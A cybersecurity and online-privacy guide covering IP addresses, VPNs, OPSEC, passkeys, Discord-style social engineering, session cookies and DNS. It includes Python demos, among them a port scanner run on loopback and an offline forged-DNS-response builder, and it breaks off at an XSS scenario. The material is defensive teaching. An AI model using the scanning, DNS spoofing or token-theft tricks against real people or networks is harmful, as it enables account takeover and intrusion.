Cybersecurity Guide

By Phylixius

"The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards. And even then I have my doubts."
— Gene Spafford

Introduction

This is a comprehensive guide made by Phylixius on how you should operate securely and stay safe online. This will not include everything, as new threats come out every day. I will try to explain things as easily as possible and provide a technical explanation. This document will be divided into 3 main categories, which are as follows:

  • Easy/Beginner
  • Medium/Amateur
  • Hard/Expert

While each topic comes with a technical explanation, it is by no means the whole story; there is a lot more going on behind the scenes. I want to balance technical depth with simplicity. I think you should know some of the background, because you can't protect yourself against something you don't understand.

Who am I?

I have been a computer and internet enthusiast since the day I was born. I have a lot of passion for all sorts of tech, and I am eager to learn, which has led me to where I am now. If I could give one sentence as a tip, it would be: research, tinker, be patient, and repeat. I could say a lot more about myself in much more detail, but luckily I have already partially done that. If you are genuinely interested in my experience, I have written a brief profile of myself on my portfolio. You can see it here.

Anyways, enough about me, let’s explain some cybersecurity topics!

Easy / Beginner

Beginner Topics

In this section, I will cover basic cybersecurity topics that everyone has heard about but few really understand.

IP Address (Internet Protocol)

An IP address is your address on the network (Layer 3 of the OSI model, the Internet layer of the TCP/IP model). It is needed for any communication at the network layer, both inside your LAN and beyond your router. It is the same as when a friend wants to mail you something: they need to know your physical address to send it to.

Thanks to network address translation (NAT), you have two kinds of IP addresses:

  • Private IP address: This is used to communicate on your local area network (LAN), like the devices in a house or a company. A private IP address of a device in your home network can be reused in another home network, because it is never routed on the internet.

    A private IP address is only relevant if you are in that local network; thus, it is not harmful for others to know. And if someone has already gained access to your home network, they can simply scan for devices on it.
  • Public IP address: This is necessary for communicating over the internet once your traffic leaves the LAN (exits the router/modem). Every device on the internet that you contact can see your public IP address (websites, apps, games, …).

    From a public IP address you can estimate roughly where it originates (city, ISP name, …), but not the exact physical coordinates. Most public IP addresses are dynamic, so they change over time; a static IP address stays the same.

    It is impossible to know your exact physical location from the IP address alone: only your ISP can map an address to a subscriber, so an attacker would need to break into the ISP's systems (and ISPs can have data breaches as well). It is also possible by matching your IP address against other stolen data from other breaches (emails, old accounts, social media) that contain your IP address and additional information. It is by combining pieces of information (username, old posts, photos with metadata) that someone can puzzle together your location; this is called cross-referencing.

    If they really want to, they could also DDoS you; more on that later.

    Another attack is scanning for open ports (ports you forwarded, for example for a website you host or a Minecraft server) and attacking the service itself. So let's say you have a computer hosting a Minecraft server; then they can attack that server to take over the computer. That's why it is important to keep your computer and the software running on it up to date. You shouldn't port forward in the first place if you don't have a security background. If you are unsure whether you have open ports, check the port-forwarding rules in your router settings, or look up your public IP address on Shodan (keeping in mind that its results aren't real-time).
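    To see both points in code (which addresses are private versus public, and what an open port looks like to a scanner), here is an added Python example; it is not part of the original guide. The sample addresses are constructed, and the scan runs against a throwaway listener on 127.0.0.1 so it is safe to run offline. Only ever point a scanner at addresses you own.

```python
import ipaddress
import socket

# Constructed sample addresses (not from the original guide).
SAMPLE_ADDRESSES = [
    "192.168.1.10",          # RFC 1918 private: reused in millions of homes
    "10.0.0.5",              # private
    "172.16.4.2",            # private
    "127.0.0.1",             # loopback: your own machine
    "169.254.1.1",           # link-local: auto-assigned, never routed
    "8.8.8.8",               # public: routable on the internet
    "2001:4860:4860::8888",  # public IPv6
]


def classify(ip: str) -> str:
    """Label an address the way NAT makes it matter: private (LAN only) or public."""
    addr = ipaddress.ip_address(ip)
    if addr.is_loopback:
        return "loopback"
    if addr.is_link_local:
        return "link-local"
    if addr.is_private:
        return "private"
    if addr.is_global:
        return "public"
    return "other"


def tcp_connect_scan(host: str, ports, timeout: float = 0.3) -> list:
    """Full-connect scan: a port is 'open' if the TCP handshake completes.
    This is exactly what an attacker's scanner sees on your public IP."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def demo_scan() -> tuple:
    """Bind a throwaway 'service' on loopback and scan a small window around it.
    Returns (listener_port, ports_found_open)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))   # port 0 = let the OS pick a free one
    listener.listen(5)
    port = listener.getsockname()[1]
    try:
        found = tcp_connect_scan("127.0.0.1", range(port - 2, port + 3))
    finally:
        listener.close()
    return port, found


if __name__ == "__main__":
    for ip in SAMPLE_ADDRESSES:
        print(f"{ip:24} {classify(ip)}")
    port, found = demo_scan()
    print(f"listener on {port}, scanner saw open: {found}")
```

    The listener never accepts a connection, yet the scan still reports it open: the kernel completes the handshake for anything that is listening, so a forwarded port is visible whether or not the service behind it is healthy.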

HTTPS (HyperText Transfer Protocol Secure)

HTTPS is the same as HTTP (a protocol to communicate with a web server), but with an additional security layer on top.

The problems with HTTP are:

  • It's not encrypted, so everything is plain text. If I could sit between you and the web server, I could see all the web traffic: your username, password, and even your cookie.
  • It can be altered, so an attacker in that position could modify your traffic and, for example, inject scripts into the pages you load.
  • Fake website: even when you type the exact, correct domain name, you can be sent to a fake copy without anyone or anything noticing, because HTTP has no way to prove which server you are really talking to.

HTTPS removes all three problems: the traffic is encrypted, tampering is detected, and the server proves its identity with a certificate for its domain. But this doesn't mean that HTTPS is 100% secure; there are still attacks that HTTPS doesn't cover (a phishing site can have a perfectly valid certificate for its own domain, for example).

VPN (Virtual Private Network)

A VPN is an overlay network: it creates a logical/virtual network topology on top of the physical one.

Simply said, it is a tunnel between you and the VPN server. All your traffic destined for the internet first goes through the tunnel to the VPN server, which then forwards it to its destination. In most cases, local traffic to your LAN doesn't pass through the tunnel. Most VPN tunnels are encrypted. The services you visit (games, websites, …) see the VPN server's IP address instead of yours.

Is it 100% private? You don't know; most VPN services claim to have a no-log policy, but whether you believe that is up to you. A no-log policy means that they don't record your activities.

Things that can still leak your real IP address or traffic around the VPN:

  • WebRTC: if it is enabled (it is in most browsers) and the VPN isn't configured to handle it, WebRTC can reveal your real IP address because its traffic doesn't go through the tunnel.
  • Some DNS setups (ISP DNS, router DNS, or a hardcoded DNS server; hardcoded means the address is written into the software itself), so your lookups leave outside the tunnel.
  • IPv6 traffic (when the VPN only handles IPv4).
  • Split tunnelling (a configuration that only routes certain applications through the tunnel).
  • Applications that connect to hardcoded IP addresses without using DNS (game launchers, anti-cheat, DRM systems, some crypto wallets), when those connections bypass the tunnel.
  • UDP traffic (when the VPN only tunnels TCP).
  • Some torrent clients (which may bind to your real network interface instead of the VPN's).
  • VPN reconnects/short drops (sleep/wake, Wi-Fi switch), when the VPN has no kill switch to block traffic while the tunnel is down.
  • ICMP (if the VPN doesn't tunnel it).
  • Malware/spyware on your device, which sees everything before it enters the tunnel.

It is also a common misunderstanding that everything you did before turning on your VPN is forgotten. For example, when you sign up for an account without a VPN, that IP address is logged and remembered, no matter how many times you use your VPN afterwards.

Should you always use a VPN? It depends on your scenario. Modern VPNs come with extra security features, but they aren't 100% necessary. They are marketed as must-have tools, which isn't true.

When you should use it:

  • Public network
  • P2P like torrenting
  • When privacy is necessary

For a VPN, I can only advise ProtonVPN and Mullvad.

Proxy

A proxy is similar to a VPN, but without all the fancy stuff. It routes traffic (usually only one application's or one protocol's, not the whole device's) through a proxy server, so the destination sees the proxy server's IP instead of yours.

There are several types of proxies, but the one I advise for visiting links that are potentially IP grabbers is a web proxy.

A good web proxy that I use a lot is Proxyium. You paste the link there and the page is fetched by the proxy server. Keep in mind that the site can still get all browser-side information: only the IP changes, so things like which browser and OS you use are still visible. If the page tries to fetch your IP address with a script running in your browser, that doesn't help them either, as long as the proxy rewrites those requests so they also go through the proxy.

OPSEC (Operational Security)

Simply said, operational security is keeping sensitive information safe so attackers can’t exploit it. In practice, this means being careful with what you share, store, or do online and in your systems.

Examples of good opsec:

  • Don't share any PII (Personally Identifiable Information):
    • Birthday/age/date of birth
    • Any location, like the country you live in or are going on vacation to (even just “Europe”), or your place of birth
    • Any part of your name
    • Your school or hobby
    • Gender
    • Phone number/email address (use a burner email when making accounts, like Temp-mail.org, or make aliases with SimpleLogin or AnonAddy)
    • Health conditions
    • Browsing history
    • Preferences and habits
    • A lot more
  • Indirect Identification
    • Texting/Chatting
      • Typing style
      • Spelling mistakes
      • Grammar habits
      • Emoji usage
      • Slang phrases
      • Capitalization
      • Time of day you’re active
      • Sleep scheduling
      • Posting frequency
      • Response speed
      • Days you’re most active
      • Topics you talk about
      • Niche interests
      • Opinions
      • Usernames
      • Who you reply to
      • Who you argue with or support
      • How you structure replies
      • Reactions
      • Emotional response
      • Humor style
      • Conflict resolution style
      • Over/under explaining
    • Other
      • Operating system (Windows, iPhone, …)
      • Microphone background noise
      • Keyboard sounds
      • Weather/local events
      • Holidays you reference
      • School/work schedule clues
  • Metadata
    • Image metadata (EXIF)
    • File creation date
    • File author
    • Screenshot resolutions
    • File names

Hear me out: leaking one of these doesn't instantly reveal your identity; it's the combination of them that does. So next time you make an alt account, know that everything you do can be linked back to you. Another thing: people like talking about themselves. Don't, because all of it can be used against you. Think of what happens when you break up with someone or argue with a friend, but worse.
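An added Python example, not part of the original guide, that shows what EXIF actually is inside a JPEG and strips it before you share the image. The sample JPEG bytes are constructed (just enough of the format to parse), and the GPS string in it is fake. Tools like exiftool do this for real files; this version is for seeing the structure.

```python
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
APP0, APP1, APP13 = 0xE0, 0xE1, 0xED
METADATA_MARKERS = {APP1, APP13}   # Exif and XMP live in APP1, IPTC/Photoshop data in APP13


def segment(marker: int, payload: bytes) -> bytes:
    """One JPEG marker segment: FF, marker, 2-byte big-endian length (counts itself), payload."""
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed sample (not a real photo): JFIF header, an Exif block carrying fake
# GPS coordinates, one quantisation table and a four-byte scan.
SAMPLE_JPEG = (
    b"\xff" + bytes([SOI])
    + segment(APP0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + segment(APP1, b"Exif\x00\x00MM\x00\x2a" + b"GPSLatitude=51.0;GPSLongitude=4.0")
    + segment(0xDB, b"\x00" + bytes(64))
    + segment(SOS, b"\x01\x01\x00\x00\x3f\x00")
    + b"\x12\x34\x56\x78"
    + b"\xff" + bytes([EOI])
)


def iter_segments(data: bytes):
    """Yield (marker, start, end) for each header segment; the SOS entry runs to end of file."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == SOS:
            yield marker, pos, len(data)
            return
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, pos, pos + 2 + length
        pos += 2 + length


def has_exif(data: bytes) -> bool:
    return any(marker == APP1 and data[start + 4:start + 10] == b"Exif\x00\x00"
               for marker, start, _ in iter_segments(data))


def strip_metadata(data: bytes) -> bytes:
    """Copy the JPEG without its APP1/APP13 segments. Pixels are untouched; only the
    EXIF/XMP/IPTC blocks (camera model, GPS position, timestamps, software) go."""
    out = bytearray(b"\xff\xd8")
    for marker, start, end in iter_segments(data):
        if marker not in METADATA_MARKERS:
            out += data[start:end]
    return bytes(out)


if __name__ == "__main__":
    cleaned = strip_metadata(SAMPLE_JPEG)
    print(f"before: {len(SAMPLE_JPEG)} bytes, exif={has_exif(SAMPLE_JPEG)}")
    print(f"after:  {len(cleaned)} bytes, exif={has_exif(cleaned)}")
```

Note that this removes whole blocks; it does nothing about what is visible in the pixels themselves (a street sign, a reflection), and screenshots carry their own tell-tales in resolution and file names.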

A privacy-focused browser that I highly recommend is DuckDuckGo, and for a privacy and security-focused communication app, I recommend Session.

Passkeys

A passkey is a lot more secure than a traditional password; it is based on a cryptographic key pair (a private key that stays on your device and a public key the website stores).

Here's an overview:

  • Phishing is practically impossible because a passkey is bound to the website's domain; a look-alike site never gets a usable signature.
  • No shared secrets: the website only stores your public key, so a data breach there doesn't leak anything that can be used to log in.
  • No reuse across sites, unlike passwords.

A passkey is stored on your device, which also means that if the device is stolen and unlocked, the thief has access to it; malware on the device is a risk too. Attackers can also social-engineer you if you are vulnerable to it. The way passkeys are synchronised (iCloud Keychain, Google Password Manager) can be a target as well, so not syncing them (a device-bound passkey) removes that attack surface.

A passkey combines something you have (your device) with something you are or know (biometric or PIN). It also only works over HTTPS.

Do I advise replacing passwords and MFA with passkeys? I 100% do, under one condition: if you lose access to the device holding the passkey, you lose the account. So store them on multiple devices and you are good to go. Or buy a YubiKey, a USB security key that you keep on your keyring.
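An added example, not from the original guide, showing why a passkey is domain-bound. The authenticator, browser and relying party are simulated in Python; an HMAC secret stands in for the real ECDSA key pair (an assumption made so the code runs with the standard library only), and example.com / example.com.evil.net are placeholder domains. The phishing case is the same situation as the AitM attack described later in this guide: the attacker relays the real challenge, but the browser only releases a passkey for the domain in the address bar.

```python
import hashlib
import hmac
import json
import secrets


def rp_id_hash(rp_id: str) -> bytes:
    return hashlib.sha256(rp_id.encode()).digest()


class Authenticator:
    """Stands in for a phone or YubiKey. Each credential is tied to one rpId and
    its key never leaves this object.
    ASSUMPTION: an HMAC secret stands in for the ECDSA key pair a real
    authenticator uses; the relying party keeps a verification copy of it where
    it would really keep the public key."""

    def __init__(self):
        self._creds = {}  # credential_id -> (rp_id, secret)

    def register(self, rp_id: str):
        cred_id = secrets.token_hex(8)
        secret = secrets.token_bytes(32)
        self._creds[cred_id] = (rp_id, secret)
        return cred_id, secret

    def sign(self, cred_id: str, rp_id: str, client_data_hash: bytes):
        stored_rp_id, secret = self._creds[cred_id]
        if stored_rp_id != rp_id:
            raise PermissionError("credential is bound to another rpId")
        auth_data = rp_id_hash(rp_id) + b"\x01"  # flags byte: user present
        signature = hmac.new(secret, auth_data + client_data_hash, "sha256").digest()
        return auth_data, signature


def browser_get_assertion(authenticator, cred_id, page_origin, challenge):
    """The browser derives rpId from the origin in the address bar; the page
    cannot choose it, which is what makes passkeys phishing-resistant."""
    rp_id = page_origin.split("://", 1)[1].split(":")[0]
    client_data = json.dumps(
        {"type": "webauthn.get", "challenge": challenge, "origin": page_origin}
    ).encode()
    auth_data, sig = authenticator.sign(cred_id, rp_id, hashlib.sha256(client_data).digest())
    return client_data, auth_data, sig


class RelyingParty:
    """The website. Checks every field an attacker could tamper with."""

    def __init__(self, rp_id, origin):
        self.rp_id, self.origin = rp_id, origin
        self.creds, self.pending = {}, {}

    def new_challenge(self, user):
        self.pending[user] = secrets.token_urlsafe(32)
        return self.pending[user]

    def verify(self, user, cred_id, client_data, auth_data, sig) -> bool:
        cd = json.loads(client_data)
        expected_challenge = self.pending.pop(user, "")
        if cd.get("type") != "webauthn.get":
            return False
        if not hmac.compare_digest(cd.get("challenge", ""), expected_challenge):
            return False                       # replayed or stale assertion
        if cd.get("origin") != self.origin:
            return False                       # signed for another site
        if auth_data[:32] != rp_id_hash(self.rp_id):
            return False                       # credential for another rpId
        expected = hmac.new(self.creds[cred_id],
                            auth_data + hashlib.sha256(client_data).digest(), "sha256").digest()
        return hmac.compare_digest(expected, sig)


def login_via(page_origin: str) -> bool:
    """Simulate one login where the user's browser is on `page_origin`.
    Returns whether the real site (https://example.com) accepts it."""
    authenticator = Authenticator()
    site = RelyingParty("example.com", "https://example.com")
    cred_id, secret = authenticator.register("example.com")
    site.creds[cred_id] = secret
    challenge = site.new_challenge("alice")   # a phishing page would relay this unchanged
    try:
        client_data, auth_data, sig = browser_get_assertion(
            authenticator, cred_id, page_origin, challenge)
    except PermissionError:
        return False   # the browser has no passkey for the phishing domain
    return site.verify("alice", cred_id, client_data, auth_data, sig)
```

Run login_via("https://example.com") and login_via("https://example.com.evil.net"): the first succeeds, the second never even produces a signature, which is why the attacker in the AitM scenario has nothing to relay.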

SOCENG (Social Engineering)

Social engineering is, as I would put it, hacking humans. It is the most common attack method hackers use.

Social Engineering has several forms, which are the following:

  • Phishing
  • Pretexting (creating false scenarios)
  • Baiting (files or USB sticks labelled “confidential” or “salaries”)
  • Impersonation
  • Tailgating / Piggybacking (following someone into a restricted area, claiming to have forgotten a badge, carrying boxes to appear legitimate)
  • Scareware to disable your critical thinking (fake virus alerts, “Your account will be closed in 24 hours”, NSFW content, “you've been hacked”, “someone is trying to log in”)
  • Reverse social engineering (the attacker makes the victim ask the attacker for help)
  • BitB (Browser in the Browser: a fake browser pop-up window drawn inside the web page itself; you can detect it because you can't drag that window outside the real browser window)
  • And more

It might sound harmless and dumb to fall for, but it is actually the largest and most dangerous vulnerability a company or group has, because your staff is your weakest spot: there are many of them, and they don't know or believe what social engineering can actually do. Humans are social creatures; keep that in mind.

Here are some examples from Discord:

  • Someone asks you to copy and paste a message, which can get you banned or your whole server raided. (For security reasons I won't disclose further details.)
  • You join a new gaming server with 1k members actively chatting, you verify your account with a verified bot, and boom, your account has been stolen. (QR code login; no further details.)
  • You see an image with a mouse and an arrow pointing to the middle mouse wheel, saying “middle-click this image”. You do it, and boom, your IP, ISP, browser name, OS name, … got leaked. (IP-grabbing website.)
  • Someone claims your face got leaked, but the image keeps loading, so you open it in your browser, and boom, your IP, ISP, browser name and OS name got leaked. (IP-grabbing website.)
  • Someone asks you to chat on another platform that is safer and more private, or for whatever reason. You call each other on Zoom/Telegram/whatever, and boom, your IP got leaked. (P2P calls connect the two devices directly.)
  • Password reset phishing scenario: You get messaged by a bot named Discord with a blue Discord logo. It says you requested a password reset because you forgot it. You ignore it; 10 minutes later it says your password has been successfully reset. If it wasn't you, it says, you need to undo it and check your security settings by following this “official” Discord link. You click it and need to log in to Discord (because your password was reset). You do so; luckily, you enabled MFA, so Discord asks for your MFA code. Like usual, you open your authenticator app, fill in the code, and you are logged into Discord. Everything looks normal, and you get a message from the same Discord bot saying you have undone your password reset and should switch to passkeys (this is only there to gain your trust; you didn't actually do it in this example). The whole thing was fake, and the attacker stole your cookie.

    How he got your cookie: He made a fake Discord bot with the same name as the real one. He sent you a message saying someone reset your password, with a link to review it. The link went to a Discord clone whose domain looked like Discord's. You ignored that. The bot has a timer of 10 minutes: if you don't fill in your credentials in time, it sends you another message saying your password has been reset, with a link to undo it (same look-alike domain). When you click it, you get the usual pop-up asking you to check the URL (and it was different). But you trust the “Discord” bot, you're panicked, and you never check it because that pop-up is annoying. The login screen you land on is the real Discord login, but served through an AitM proxy (more on that later). You log in, and everything looks normal. The bot detected your login and sent you a message that your password reset has been undone, as if nothing happened.
  • A GFX artist asks to use your avatar, and you agree. She asks you to screen-share, or sends you a video with 100k views on how to export your avatar “officially”. The video says you need to press F12, go to the Network tab, export the file for your avatar and send it to her, and boom, she has your cookie. (The exported HAR file contains every request's headers, including your session token.)
  • Someone thinks you are cheating and turns the whole group against you, threatening to ban you or put you in cheater databases. You didn't do anything and ask for a PC check. They PC-check you and ask you to do a bunch of legitimate-looking things: searching your history for exploits and injectors, etc. Then he asks you to open the developer tools and scroll through your “exploit logs”, and boom, he has your cookie. (He was reading your request headers in the Network tab, which include your cookies and token.)
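An added Python example (not from the original guide) of what is inside the file from the HAR scenario above, and how to redact one before sharing it with anyone. The HAR excerpt, hostnames and token values are constructed.

```python
import copy
import json

# Constructed HAR excerpt in the shape browser dev tools export; not a real capture.
SAMPLE_HAR = {
    "log": {"version": "1.2", "entries": [
        {"request": {"method": "GET", "url": "https://chat.example/api/users/@me",
                     "headers": [{"name": "Authorization", "value": "mfa.constructed-token-AAAAbbbbCCCC"},
                                 {"name": "User-Agent", "value": "Mozilla/5.0"}],
                     "cookies": [{"name": "__session", "value": "s%3Aconstructed-session-cookie"}]},
         "response": {"status": 200,
                      "headers": [{"name": "Set-Cookie", "value": "__cfruid=constructed; HttpOnly"}],
                      "content": {"mimeType": "application/json", "text": "{\"id\":\"123\"}"}}},
        {"request": {"method": "GET", "url": "https://cdn.example/avatars/123.png",
                     "headers": [{"name": "Accept", "value": "image/png"}], "cookies": []},
         "response": {"status": 200, "headers": [],
                      "content": {"mimeType": "image/png", "text": ""}}},
    ]}
}

# Headers that carry authentication. Matched case-insensitively.
SENSITIVE_HEADERS = {"authorization", "cookie", "set-cookie", "proxy-authorization"}
REDACTED = "[REDACTED]"


def sensitive_values(har: dict) -> list:
    """Return (where, name, value) for every secret a recipient of this HAR would obtain."""
    found = []
    for i, entry in enumerate(har["log"]["entries"]):
        for side in ("request", "response"):
            for h in entry[side].get("headers", []):
                if h["name"].lower() in SENSITIVE_HEADERS:
                    found.append((f"entry {i} {side} header", h["name"], h["value"]))
            for c in entry[side].get("cookies", []):
                found.append((f"entry {i} {side} cookie", c["name"], c["value"]))
    return found


def redact(har: dict) -> dict:
    """Return a deep copy with every sensitive header and cookie value replaced,
    so the file can still be used for debugging without handing over your session."""
    clean = copy.deepcopy(har)
    for entry in clean["log"]["entries"]:
        for side in ("request", "response"):
            for h in entry[side].get("headers", []):
                if h["name"].lower() in SENSITIVE_HEADERS:
                    h["value"] = REDACTED
            for c in entry[side].get("cookies", []):
                c["value"] = REDACTED
    return clean


def contains_secret(har: dict, needle: str) -> bool:
    """Does the serialised file still contain this string anywhere?"""
    return needle in json.dumps(har)


if __name__ == "__main__":
    for where, name, value in sensitive_values(SAMPLE_HAR):
        print(f"{where}: {name} = {value}")
    print(json.dumps(redact(SAMPLE_HAR), indent=1)[:300])
```

Even the “innocent” avatar request is bundled with the authenticated one in the same export, which is why “just send me the avatar file” hands over the token.
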

You should never do the following:

  • Open the developer console (press F12) because someone asked you to.
  • Open shortened links.
  • Download files from the internet on request (a password-protected ZIP file is a massive red flag, as antivirus software can't inspect what is inside it).

And always should do the following:

  • Hover over links or check the open link warnings to see the true link.
  • Put the link in VirusTotal to check if it is malicious, or search the domain in Google (not visiting the website, just searching if the link is known to be trusted).
  • Put the link in a webproxy as I said earlier.

If no one has ever tried to scam you, or you have been scammed before, or you are smart and want to avoid these situations, then I strongly suggest not letting anyone add you as a friend or private-message you. Even people you trust, because an attacker can buy an aged account that doesn't look like an alt from a marketplace and build a strong relationship with you to gain trust, or a friend you already trust may have been hacked. If they can't get to you directly, they will go through your friends or the people you trust.

If you want to test your phishing detection skills, then here is a test you should consider taking: Google’s Phishing Quiz.

Cookie/Session Token

The purpose of a cookie/session token is convenience: staying logged in between visits.

When you log into Instagram, for example, you want to stay logged in; you don't want to give your credentials every time you revisit Instagram. For this to work, the website needs to remember you. When you log in, the server sets a cookie in your browser; without it, you would be forgotten on the next visit.

In short:

  • A cookie is a small value stored in your browser, sent back to the website on every request, and remembered when you reopen your browser or restart your PC. It is used to remember website preferences and anything else the website needs to remember.
  • A session token, on the other hand, is a random generated string that is stored in a cookie so you don't have to log in every time you visit the website. It is as good as your password for as long as it is valid.

If you take someone else's token and put it in your browser, the website will think you are that person revisiting the site.

If someone stole your cookie, you can invalidate it by changing your password (most services log out all existing sessions when you do) or by using the “log out of all devices” option if the service has one.
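An added Python example (not from the original guide) of the server side of this: a session store in which a copied token logs the thief in, and changing the password revokes it. Usernames and passwords are constructed.

```python
import hashlib
import hmac
import secrets


class SessionStore:
    """Minimal server side of 'stay logged in': passwords are stored salted and
    hashed, session tokens are random and stored only as hashes, so neither a
    leaked database nor a guessed token helps an attacker."""

    def __init__(self):
        self._passwords = {}  # user -> (salt, pbkdf2 hash)
        self._sessions = {}   # sha256(token) -> user

    @staticmethod
    def _hash_password(password: str, salt: bytes) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def register(self, user: str, password: str) -> None:
        salt = secrets.token_bytes(16)
        self._passwords[user] = (salt, self._hash_password(password, salt))

    def login(self, user: str, password: str):
        """Return a fresh session token (the value put in the cookie) or None."""
        if user not in self._passwords:
            return None
        salt, stored = self._passwords[user]
        if not hmac.compare_digest(stored, self._hash_password(password, salt)):
            return None
        token = secrets.token_urlsafe(32)
        self._sessions[hashlib.sha256(token.encode()).hexdigest()] = user
        return token

    def whoami(self, token: str):
        """What every later request does with the cookie: look the token up.
        No password is involved, so whoever holds the token is 'you'."""
        return self._sessions.get(hashlib.sha256(token.encode()).hexdigest())

    def logout_everywhere(self, user: str) -> None:
        self._sessions = {k: u for k, u in self._sessions.items() if u != user}

    def change_password(self, user: str, new_password: str) -> None:
        """Changing the password also revokes every existing session, which is
        what actually kills a stolen cookie."""
        self.register(user, new_password)
        self.logout_everywhere(user)


def set_cookie_header(token: str) -> str:
    """HttpOnly keeps page scripts from reading it, Secure keeps it off plain
    HTTP, SameSite limits cross-site sending."""
    return f"session={token}; HttpOnly; Secure; SameSite=Lax; Path=/"


def demo() -> tuple:
    """Returns (who the stolen token identifies before, and after, a password change)."""
    store = SessionStore()
    store.register("alice", "correct horse battery staple")
    token = store.login("alice", "correct horse battery staple")
    stolen = token                   # attacker copied the cookie (infostealer, HAR file, dev tools)
    before = store.whoami(stolen)    # 'alice': the server cannot tell the two browsers apart
    store.change_password("alice", "new and different")
    after = store.whoami(stolen)     # None: the token was revoked
    return before, after


if __name__ == "__main__":
    print(demo())
```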

DoS Attack (Denial of Service)

This is a cyber attack where the attacker wants to make a service unavailable; it can be caused by anything that exhausts the service's resources or crashes it.

The most common method is a DDoS (Distributed DoS), where an attacker uses a large number of (mostly infected) devices to flood your bandwidth or resources. If you want to see this in action, you can visit this webpage.

Other methods include, for example, an exploit that crashes a web server so it's no longer reachable. DoS is simply the practice of making a service unreachable.

Medium / Amateur

Intermediate Topics

This section is a bit more in-depth; it is possible that you won't understand certain parts at first.

DNS (Domain Name System/Server)

Simply said, DNS's main purpose is to translate domain names into IP addresses. We, as humans, remember text better than numbers. If you visit a website like YouTube, you type youtube.com, not an IP address. This works thanks to DNS servers: a decentralised, hierarchical system of servers that together hold every domain name (like youtube.com) with its IP addresses. They remember the numbers for us.

If an attacker is on your network (café, restaurant, free Wi-Fi), he can hand you a fake DNS server through various methods (a rogue DHCP server or ARP spoofing, for example) and answer your lookups with his own IP address, so the same domain name shows you another website. This is called MITM (Man in the Middle: someone sitting between you and the other end of the connection). It only works with HTTP, not HTTPS, because the fake server can't present a valid certificate for the real domain. Over HTTP, an attacker can show you a fake YouTube page that works.

DNS traffic is also not encrypted by default, so everything between your device and the DNS server (including a MITM attacker) can see which domains you request. You can enable encryption for DNS without a VPN, but it isn't easy to set up and won't be covered here. If you really want to, you can use DoH (DNS over HTTPS); there are more options (DoT, DNS over TLS, for instance), but this is the most popular one.
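An added Python example, not from the original guide, that builds a DNS query, parses the answer, and forges one. It shows why plain DNS is so easy to spoof: the client can only check a 16-bit ID and that the question was echoed back; nothing is signed. The addresses 203.0.113.5 and 198.51.100.66 are documentation ranges, not real YouTube servers, and nothing is sent over the network.

```python
import secrets
import struct


def encode_name(name: str) -> bytes:
    """'youtube.com' -> b'\\x07youtube\\x03com\\x00' (length-prefixed labels)."""
    out = b"".join(bytes([len(label)]) + label.encode()
                   for label in name.strip(".").split("."))
    return out + b"\x00"


def decode_name(data: bytes, pos: int):
    """Read a name at `pos`, following compression pointers. Returns (name, next_pos)."""
    labels, end = [], None
    while True:
        length = data[pos]
        if length & 0xC0 == 0xC0:            # pointer to an earlier copy of the name
            if end is None:
                end = pos + 2
            pos = struct.unpack(">H", data[pos:pos + 2])[0] & 0x3FFF
            continue
        pos += 1
        if length == 0:
            break
        labels.append(data[pos:pos + length].decode())
        pos += length
    return ".".join(labels), (pos if end is None else end)


def build_query(name: str, txid=None) -> bytes:
    txid = secrets.randbelow(65536) if txid is None else txid
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)    # RD=1, one question
    return header + encode_name(name) + struct.pack(">HH", 1, 1)  # QTYPE A, QCLASS IN


def parse_message(data: bytes) -> dict:
    txid, flags, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", data[:12])
    pos, questions, answers = 12, [], []
    for _ in range(qdcount):
        qname, pos = decode_name(data, pos)
        qtype, _ = struct.unpack(">HH", data[pos:pos + 4])
        pos += 4
        questions.append((qname, qtype))
    for _ in range(ancount):
        name, pos = decode_name(data, pos)
        rtype, _, ttl, rdlen = struct.unpack(">HHIH", data[pos:pos + 10])
        pos += 10
        rdata = data[pos:pos + rdlen]
        pos += rdlen
        if rtype == 1 and rdlen == 4:        # A record
            answers.append((name, ".".join(str(b) for b in rdata), ttl))
    return {"id": txid, "flags": flags, "questions": questions, "answers": answers}


def build_response(query: bytes, ip: str, ttl: int = 300) -> bytes:
    """Answer a query with any IP we like: copy the ID and question, append an A
    record whose name is a pointer (0xC00C) back to the question at offset 12.
    A real resolver and an attacker on the Wi-Fi build exactly the same bytes."""
    txid = struct.unpack(">H", query[:2])[0]
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 0)    # QR=1 RD=1 RA=1
    question = query[12:]
    answer = (b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, ttl, 4)
              + bytes(int(o) for o in ip.split(".")))
    return header + question + answer


def client_accepts(query: bytes, response: bytes) -> bool:
    """Everything a plain-DNS client can check. None of it is a signature."""
    q, r = parse_message(query), parse_message(response)
    return bool(r["flags"] & 0x8000) and r["id"] == q["id"] and r["questions"] == q["questions"]


if __name__ == "__main__":
    q = build_query("youtube.com", txid=0x1234)
    for label, ip in (("legit", "203.0.113.5"), ("spoofed", "198.51.100.66")):
        r = build_response(q, ip)
        print(label, parse_message(r)["answers"], "accepted:", client_accepts(q, r))
```

Whichever answer arrives first wins; on the same Wi-Fi the attacker is closer than the real resolver. DoH and DoT close this hole by putting the exchange inside TLS, so a forged answer can't be injected into it.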

XSS (Cross-Site-Scripting)

Scenario: You have a Discord concern or question, but aren't familiar with the Discord blog, so you just ask in a server. Someone replies and says you should move to DMs, as otherwise the server gets annoyed by the question. He explains briefly, but for more information he says you should consult the official blog post and gives you the link (a real link, no phishing or fake domain), which goes to the official Discord blog with an admin explaining how to secure your account. And boom, your cookie has been stolen.

But wait… How?

